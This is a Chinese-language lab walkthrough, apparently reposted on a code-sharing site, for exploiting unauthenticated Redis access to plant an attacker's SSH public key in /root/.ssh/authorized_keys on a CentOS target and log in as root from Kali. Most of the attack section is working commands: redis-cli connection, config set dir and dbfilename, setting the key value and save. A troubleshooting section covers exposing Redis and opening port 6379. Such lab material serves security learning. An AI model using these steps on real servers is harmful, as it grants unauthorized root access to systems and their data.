Redis未授權訪問實現SSH免密登錄


Redis未授權訪問實現SSH免密登錄

1. 環境簡介

1.1 物理環境

  攻擊主機(kali linux)
  靶機(CentOS 7)

1.2 網絡環境

  Kali:192.168.32.128
  CentOS:192.168.32.129

1.3 工具

  Kali:Redis+SSH
  CentOS:Redis(root權限)+SSH

1.4 流程

  攻擊機kali遠程連接靶機Redis數據庫
  攻擊機SSH生成公鑰私鑰
  通過Redis將公鑰寫入靶機的SSH路徑下
  攻擊機SSH連接成功

2. 攻擊過程

2.1 通過未授權訪問連接至靶機Redis

  redis-cli -h 192.168.32.129

2.2 攻擊機生成SSH公鑰

  生成公鑰私鑰
  ssh-keygen -t rsa
  一路回車

  查看公鑰內容

  編輯公鑰內容為Redis指令

2.3 攻擊機操作靶機Redis

  指定目錄
  config set dir /root/.ssh
  指定文件名
  config set dbfilename authorized_keys
  設置公鑰內容
  set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+DUob5niJ3mvoDW2raDBKXcbaqYZISbWHfLeGYYUX9R3VnsS5phma/7FHmm6MQWi5a6sjPSQCdcquaEmCuzfRnWdzV5e3s0rl3/NuQt4LgJcH38dpKsrg6FMRc0y6d4dRYZ1TzwJ+U8HOne5DplbwuXH7/9ZjNrTfcSp2LR4DB+8OmW6F0+f2QHNL0xftDn+FYJmLgSBVyYch6itF9fmEMMHxuoYvkxdnFZd2nmydykVQtpbvMXf2TVTPn0NAzzubT6wbaoTzzPswgfTrEijIyBCAicJGJMo6kINb+7BsGh1o7Ehdf721sJJCkXuVJJdfF+ZCaUvHPkOa7KjpWm+FkQtxif96prhRulZhZe3XNXUkIiy/KMUKrSTJC1b15TgVN/92IrkogugSUmf6yncEiT65azUzV40XQzYhpT0OZBQk1gMvXAbnU2eZ7w22o2pF8Qpn9jYR+zM4uZX90J9p5yCxWHCOJSyxHddVzM6hxbot0IAoVnsk8e3ukZ2E/LE= root@kali\n\n\n"
  保存
  save

2.4 SSH連接成功

  首次連接ssh

  寫入公鑰后再次連接SSH

3 踩坑

3.1 Redis開啟遠程連接

  Redis安裝好后需要開啟遠程連接,修改redis.conf文件
  第一個框內容需要注釋掉,第二個框需要將yes改為no

  修改后重啟Redis,加載指定conf文件
  ./redis-server /root/redis-6.0.9/redis.conf

  防火牆開6379
  開啟6379端口
  firewall-cmd --zone=public --add-port=6379/tcp --permanent

  重啟firewall
  firewall-cmd --reload

  查看狀態
  firewall-cmd --query-port=6379/tcp

3.2 路徑/root/.ssh不存在

  靶機開啟ssh
  systemctl start sshd

  路徑/root/.ssh不存在

  這時需要本機連一下自己的ssh,就會有路徑了


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM